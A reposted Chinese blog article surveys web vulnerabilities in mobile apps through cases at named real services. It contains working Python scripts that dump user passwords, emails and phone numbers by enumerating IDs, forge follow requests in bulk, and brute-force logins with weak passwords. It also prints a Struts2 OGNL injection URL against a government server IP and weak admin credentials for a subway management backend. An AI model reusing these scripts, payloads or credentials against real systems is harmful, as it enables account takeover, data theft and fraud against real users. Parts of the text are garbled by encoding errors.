當(dāng)前位置：首頁(yè) > 编程资源 > 编程问答 >内容正文

编程问答

移动App中常见的Web漏洞

發(fā)布時(shí)間：2023/12/29 编程问答 22 豆豆

生活随笔收集整理的這篇文章主要介紹了移动App中常见的Web漏洞小編覺(jué)得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.

?本文轉(zhuǎn)自：http://www.dickeye.com/?id=16

?主要是手機(jī)APP漏洞放在web端測(cè)試學(xué)習(xí)了

智能手機(jī)的存在讓網(wǎng)民的生活從PC端開(kāi)始往移動(dòng)端轉(zhuǎn)向，現(xiàn)在網(wǎng)民的日常生活需求基本上一部手機(jī)就能解決。外賣，辦公，社交，銀行轉(zhuǎn)賬等等都能通過(guò)移動(dòng)端App實(shí)現(xiàn)。那么隨之也帶來(lái)了很多信息安全問(wèn)題，大量的用戶信息儲(chǔ)存在移動(dòng)App中，由于移動(dòng)App的開(kāi)發(fā)并不健全，由移動(dòng)App引發(fā)的用戶信息泄露事件也層出不窮。

移動(dòng)App中的Web型漏洞主要分為以下幾塊：

1.SQL注入漏洞

這是一個(gè)不能再常見(jiàn)的漏洞類型了，由于App的特性，開(kāi)發(fā)人員認(rèn)為使用App時(shí)無(wú)法獲取到詳細(xì)URL等信息，所以忽視了App防注入的編寫(xiě)。

例如：

糗事百科某處SQL注入可導(dǎo)致1500w用戶信息泄露

http://loudong.360.cn/vul/info/qid/QTVA-2015-177818

全峰快遞注入漏洞，可直接建服務(wù)器用戶，各種訂單用戶數(shù)據(jù)泄露

http://loudong.360.cn/vul/info/qid/QTVA-2014-106574

永輝超市Appsql注入導(dǎo)致超市及用戶信息泄露?

http://loudong.360.cn/vul/info/qid/QTVA-2014-106385

社交App“小濕妹”某處洞洞，數(shù)據(jù)庫(kù)淪陷

http://loudong.360.cn/vul/info/qid/QTVA-2015-179315

提升逼格的App“交換”數(shù)據(jù)庫(kù)淪陷，用戶信息泄露

http://loudong.360.cn/vul/info/qid/QTVA-2015-177968

這些漏洞都是由于App開(kāi)發(fā)中忽視了接口可能存在SQL注入問(wèn)題，其中也包括POST注入，GET注入，COOKIE注入等等。

拿糗事百科注入詳細(xì)舉例：

在查詢用戶詳細(xì)信息時(shí)抓包，包內(nèi)容如下：

????GET?/user/6122886/detail?rqcnt=12&r=dec363d71423481245949?HTTP/1.1????User-Agent:?qiushibalke_6.2.0_WIFI_auto_7????Source:?android_6.2.0????Model:?Xiaomi/cancro_wc_lte/cancro:4.4.4/KTU84P/V6.3.3.0.KXDCNBL:user/release-keys????Qbtoken:?929efcfa9875f584f9f4db17343d16d7b1ec404b????Uuid:?IMEI_2af2c2beee1dbd00d3436cffdec363d7????Deviceidinfo:?{"DEVICEID":"99000566573203","RANDOM":"","ANDROID_ID":"2e6990c574abdd57","SIMNO":"89860313100285780111'","IMSI":"460031219452851","SERIAL":"5d999491","MAC":"0c:1d:af:db:07:9c","SDK_INT":19}????Host:?nearby.qiushibaike.com????Connection:?Keep-Alive????Accept-Encoding:?gzip

其中Qbtoken參數(shù)存在注入

2.任意用戶注冊(cè)漏洞

此類漏洞并不危害到用戶信息泄露，但是別有用心的黑客可能會(huì)利用此漏洞注冊(cè)任意手機(jī)號(hào)碼，并利用此注冊(cè)賬號(hào)去社工號(hào)碼主人的朋友或者家人。

漏洞案例：

App“tataufo”某處漏洞可修改任意用戶密碼

http://loudong.360.cn/vul/info/qid/QTVA-2015-192209

App“約飯”任意用戶注冊(cè)

http://loudong.360.cn/vul/info/qid/QTVA-2015-193610

App“樓樓”任意用戶注冊(cè)

http://loudong.360.cn/vul/info/qid/QTVA-2015-193622

任意用戶注冊(cè)漏洞中大部分是由于驗(yàn)證碼機(jī)制不健全和注冊(cè)過(guò)程驗(yàn)證不嚴(yán)謹(jǐn)，其中App“約飯”任意用戶注冊(cè)中

發(fā)送注冊(cè)請(qǐng)求后直接返回了驗(yàn)證碼值。

而App“樓樓”任意用戶注冊(cè)中，注冊(cè)流程分為四個(gè)步驟

(1).注冊(cè)用戶，填寫(xiě)手機(jī)號(hào)，發(fā)送接收驗(yàn)證碼請(qǐng)求。

(2).接收驗(yàn)證碼，并填寫(xiě)。

(3).填寫(xiě)并驗(yàn)證驗(yàn)證碼，進(jìn)入填寫(xiě)資料步驟。

(4).填寫(xiě)用戶資料，完成注冊(cè)。

而這里在第四個(gè)步驟中出現(xiàn)了問(wèn)題，前三步正常操作，在第四步時(shí)將資料中的號(hào)碼改為任意手機(jī)號(hào)即能實(shí)現(xiàn)任意用戶注冊(cè)。

3.用戶信息泄露

這種類型的漏洞多在用戶資料查閱處存在，由于編寫(xiě)不嚴(yán)謹(jǐn)，在查詢用戶資料時(shí)會(huì)返回用戶隱私信息，如賬號(hào)郵箱，手機(jī)，密碼等。

如：

App“嘰友”泄露用戶信息

http://loudong.360.cn/vul/info/qid/QTVA-2015-193589

Duang~App“小柚”用戶信息泄露附驗(yàn)證腳本（密碼，郵箱，手機(jī)號(hào)）

http://loudong.360.cn/vul/info/qid/QTVA-2015-187508

糗事百科某處泄露用戶信息

http://loudong.360.cn/vul/info/qid/QTVA-2015-177827

拿App“小柚”舉例

????? 訪問(wèn)用戶資料直接返回一些敏感信息，密碼，郵箱，手機(jī)號(hào)

????? 寫(xiě)個(gè)Python腳本來(lái)dump用戶信息

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42

????#!/usr/bin/env?python ????#?_*_?coding:?utf-8?_*_? ????#?author=Hydra_Tc ????#?create=20150227 ????import?os ????import?json ????import?random ????import?requests ????import?threadpool?as?tp ????def?baopo(): ????????????flag?=?0 ????????????userid?=?0 ????????????while?True: ????????????????????flag?+=?1 ????????????????????userid?+=?1 ????????????????????data?=?{'userid'?:?userid,} ????????????????????api_url?=?'http://App.hixiaoyou.com/User/Me/getuserinfo' ????????????????????my_string?=?"userid" ????????????????????try: ????????????????????????????print?'[%s]?Test?Userid:?%s'?%?(flag,?userid) ????????????????????????????req?=?requests.post(api_url,?data=data,?timeout=5) ????????????????????????????req_id?=?json.loads(req.content)['userid'] ????????????????????????????req_mail?=?json.loads(req.content)['email'] ????????????????????????????req_mobile?=?json.loads(req.content)['mobile'] ????????????????????????????req_qq?=?json.loads(req.content)['QQ'] ????????????????????????????req_pass?=?json.loads(req.content)['password'] ????????????????????except: ????????????????????????????req_status?=?0 ????????????????????if?my_string?in?req.json(): ????????????????????????????success_f?=?open('./success_user1.txt',?'a+') ????????????????????????????success_f.write('%s--%s--%s--%s--%s\n'%(req_id,req_qq,req_mobile,req_mail,req_pass)) ????????????????????????????success_f.close() ????????????????????????? ????if?__name__?==?'__main__': ????????????baopo() ????????????pool?=?tp.ThreadPool(100) ????????????reqs?=?tp.makeRequests(baopo) ????????????[pool.putRequest(req)?for?req?in?reqs] ????????????pool.wait()

????????結(jié)果如下

????????

????????4.框架問(wèn)題（st2等）

????????這個(gè)并不多但也不容忽視

????????國(guó)家統(tǒng)計(jì)局手機(jī)網(wǎng)站新聞管理系統(tǒng)兩處漏洞

????????http://loudong.360.cn/vul/info/qid/QTVA-2014-113456

????????App“將愛(ài)”某漏洞可致服務(wù)器淪陷，泄露用戶信息

????????http://loudong.360.cn/vul/info/qid/QTVA-2015-193592

????????國(guó)家統(tǒng)計(jì)局手機(jī)新聞管理系統(tǒng)漏洞如下：

http://219.235.129.108:8080/NewManager/admin/login.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D

5.后臺(tái)弱口令

由于App站點(diǎn)URL信息并不是很明顯，所以管理在設(shè)置后臺(tái)路徑和密碼方面也顯得比較隨意

如：

北京市地鐵站新聞后臺(tái)管理系統(tǒng)淪陷

http://loudong.360.cn/vul/info/qid/QTVA-2014-124853

????????抓包得到

????????http://119.254.65.181/SubwayManagement/webservice/SubwayService

????????往上跨目錄得到

????????http://119.254.65.181/SubwayManagement/和http://119.254.65.181/

????????兩個(gè)后臺(tái)系統(tǒng)，前者存在弱口令admin?admin??和??admin?beijingditieAppadmin

????????

6.越權(quán)漏洞

這個(gè)漏洞出現(xiàn)率僅次于SQL注入

App“逗萌”某處設(shè)計(jì)不當(dāng)（附驗(yàn)證腳本）

http://loudong.360.cn/vul/info/qid/QTVA-2015-192485

社交App“足記”漏洞打包

http://loudong.360.cn/vul/info/qid/QTVA-2015-178379

App“tataufo”某處漏洞可修改任意用戶密碼

http://loudong.360.cn/vul/info/qid/QTVA-2015-192209

拿App“逗萌”某處設(shè)計(jì)不當(dāng)為例

在App中對(duì)用戶添加關(guān)注處沒(méi)有任何驗(yàn)證

????POST?/HC_AppClient/client-method/followUser.json?HTTP/1.1????Content-Length:?39????Content-Type:?Application/x-www-form-urlencoded????Host:?115.29.5.49:80????Connection:?Keep-Alive????User-Agent:?Apache-HttpClient/UNAVAILABLE?(java?1.4)?????fromUserId=14004049&toUserId=1398055700

寫(xiě)了個(gè)腳本開(kāi)始刷粉絲

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37

????#!/usr/bin/env?python ????#?_*_?coding:?utf-8?_*_? ????#?author=Hydra_Tc ????#?create=20150306 ????import?os ????import?json ????import?random ????import?requests ????import?threadpool?as?tp ????def?baopo(): ????????????flag?=?1 ????????????fromUserId?=?13980556 ????????????while?True: ????????????????????flag?+=?1 ????????????????????fromUserId?+=?1 ????????????????????data?=?{'fromUserId'?:?fromUserId, ????????????????????????????????????'toUserId'?:?'13980556',} ????????????????????api_url?=?'http://115.29.5.49/HC_APPClient/client-method/followUser.json' ????????????????????my_string?=?"body" ????????????????????try: ????????????????????????????print?'[%s]?Test?Userid:?%s'?%?(flag,?fromUserId) ????????????????????????????req?=?requests.post(api_url,?data=data,?timeout=5) ????????????????????except: ????????????????????????????req_status?=?0 ????????????????????if?my_string?in?req.json(): ????????????????????????????success_f?=?open('./success_user1.txt',?'a+') ????????????????????????????success_f.write('%s\n'%(fromUserId)) ????????????????????????????success_f.close() ????????????????????????? ????if?__name__?==?'__main__': ????????????baopo() ????????????pool?=?tp.ThreadPool(100) ????????????reqs?=?tp.makeRequests(baopo) ????????????[pool.putRequest(req)?for?req?in?reqs] ????????????pool.wait()

7.接口未限制導(dǎo)致撞庫(kù)

其實(shí)這個(gè)我也是看到蘑菇牛發(fā)的沒(méi)拍漏洞才開(kāi)始注意此類型漏洞的，運(yùn)氣還算不錯(cuò)，兩三天就找到個(gè)同類型的、

App“瘋拍”兩處漏洞打包，附驗(yàn)證腳本

http://loudong.360.cn/vul/info/qid/QTVA-2015-185861

瘋拍存在兩處漏洞，此處只舉例接口未限制導(dǎo)致撞庫(kù)

我用一個(gè)未注冊(cè)手機(jī)號(hào)登陸返回提示

????{"success":false,"error":"\u8be5\u53f7\u7801\u5c1a\u672a\u6ce8\u518c\uff0c\u8bf7\u5148\u6ce8\u518c"}{"success":false,"error":"該號(hào)碼尚未注冊(cè)，請(qǐng)先注冊(cè)"}

提示尚未注冊(cè)，用注冊(cè)的用戶登陸。

若密碼錯(cuò)誤，則會(huì)提示

????{"success":false,"error":"\u5bc6\u7801\u9519\u8bef\uff0c\u518d\u4ed4\u7ec6\u60f3\u60f3"}{"success":false,"error":"密碼錯(cuò)誤，再仔細(xì)想想"}

????若密碼正確

????{"success":true,"data":{"data":{"ucookie":"19151821c062f8a0252dc3a951940b8dc5a238188447a260b145e1e40fc3d48d9","username":"1234566666","avatar":"","level":0,"score":0,"setting":"{}","uid":16942,"nickname":"1234566666","t":1424918536},"expire":false}}

此處內(nèi)容包含cookie，等相關(guān)信息。那么我們?cè)谀⒐降哪_本上稍微加一些改動(dòng)即可實(shí)現(xiàn)爆破。

腳本如下，加了注釋

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68

????#!/usr/bin/env?python ????#?_*_?coding:?utf-8?_*_? ????#?author=Hydra_Tc ????#?create=20150224S ????import?json ????import?random ????import?requests ????import?threadpool?as?tp ????def?_burp(mobile):?#?驗(yàn)證密碼是否正確 ????????????for?password?in?['qwertyu','123456',?'123456789',?'000000',?mobile,'1234567','12345678','1234567890']:?#?弱口令密碼 ????????????????????api_url?=?'http://aifengpai.com/api/user/login'???#?登陸接口 ????????????????????data?=?{'mobile':?mobile, ????????????????????????????????????'did':'c71c53fa20c38d4a14ae8245bac9bb99', ????????????????????????????????????'password':?password,}???#?登陸參數(shù)，這里簡(jiǎn)化了，去除了不必要的參數(shù) ????????????????????try: ????????????????????????????print?'[*]?Burp?mobile:?%s'?%?mobile ????????????????????????????req?=?requests.post(api_url,?data=data,?timeout=5)?#?requests模塊的post請(qǐng)求 ????????????????????except: ????????????????????????????continue ????????????????????try: ????????????????????????????success?=?json.loads(req.content)['data'] ????????????????????????????burp_success?=?open('./fengpai_account.txt',?'a+')?#?隨機(jī)成功后生成該txt，并寫(xiě)成功數(shù)據(jù) ????????????????????????????burp_success.write('%s:::%s\n'%(mobile,?password)) ????????????????????????????burp_success.close() ????????????????????????????print?success ????????????????????????????return?success ????????????????????except: ????????????????????????????success?=?0 ????????????????????????????print?'[-]?Burp?False' ????????????????????????????continue ????def?_status(args):?#?判斷手機(jī)號(hào)是否注冊(cè) ????????????flag?=?0 ????????????list?=?"0123456789"? ????????????sa?=?[] ????????????for?i?in?range(8):?#長(zhǎng)度8,改了一下蘑菇牛的范圍寫(xiě)法，自身測(cè)試感覺(jué)測(cè)試速度稍微加快了點(diǎn) ????????????????????sa.Append(random.choice(list)) ????????????while?True: ????????????????????flag?+=?1 ????????????????????account_test?=?random.choice(['138','130','133','135','138','139','150','152','155','159','180','181','182','185','187','189'])\?#?手機(jī)號(hào)前幾位 ????????????????????????????????????????????????????+''.join(sa) ????????????????????data?=?{'mobile':?account_test, ????????????????????????????????????'did':'c71c53fa20c38d4a14ae8245bac9bb99', ????????????????????????????????????'password':?'jhjhksd'} ????????????????????api_url?=?'http://aifengpai.com/api/user/login' ????????????????????try: ????????????????????????????print?'[%s]?Test?account:?%s'?%?(flag,?account_test) ????????????????????????????req?=?requests.post(api_url,?data=data,?timeout=3) ????????????????????????????req_status?=?json.loads(req.content)['error']?#?提取response里error處內(nèi)容 ????????????????????except: ????????????????????????????req_status?=?0 ????????????????????if?req_status?==?u'\u5bc6\u7801\u9519\u8bef\uff0c\u518d\u4ed4\u7ec6\u60f3\u60f3':?#兩值相等則存在有該賬號(hào) ????????????????????????????success_f?=?open('./fp_phone.txt',?'a+') ????????????????????????????success_f.write('%s\n'%account_test) ????????????????????????????success_f.close() ????????????????????????????_burp(account_test) ????????????????????????????print?'\n[OK]?account:?%s\n'?%?account_test ????if?__name__?==?'__main__': ????????????args?=?[] ????????????for?i?in?range(30): ????????????????????args.Append(args)? ????????????pool?=?tp.ThreadPool(30) ????????????reqs?=?tp.makeRequests(_status,?args) ????????????[pool.putRequest(req)?for?req?in?reqs] ????????????pool.wait()

改了下蘑菇牛的隨機(jī)數(shù)生成方式。

?????? 因?yàn)樵揂pp并沒(méi)有像美拍那樣擁有很多用戶所以爆破起來(lái)有點(diǎn)難，所以我在測(cè)試的時(shí)候把，測(cè)試范圍函數(shù)里的list改為了

???list?=?"8"

?????? 手機(jī)前三位改為了

????account_test?=?random.choice(['138'])\?#?手機(jī)號(hào)前幾位

????

????這樣只會(huì)生成13888888888（這個(gè)號(hào)碼提交之前測(cè)試時(shí)候注冊(cè)過(guò)）

????????進(jìn)行爆破結(jié)果如下

轉(zhuǎn)載于:https://www.cnblogs.com/dongchi/p/4466951.html

總結(jié)

以上是生活随笔為你收集整理的移动App中常见的Web漏洞的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。

上一篇： vue-cli项目引入highchart
下一篇： Windows 10安装错误：0x803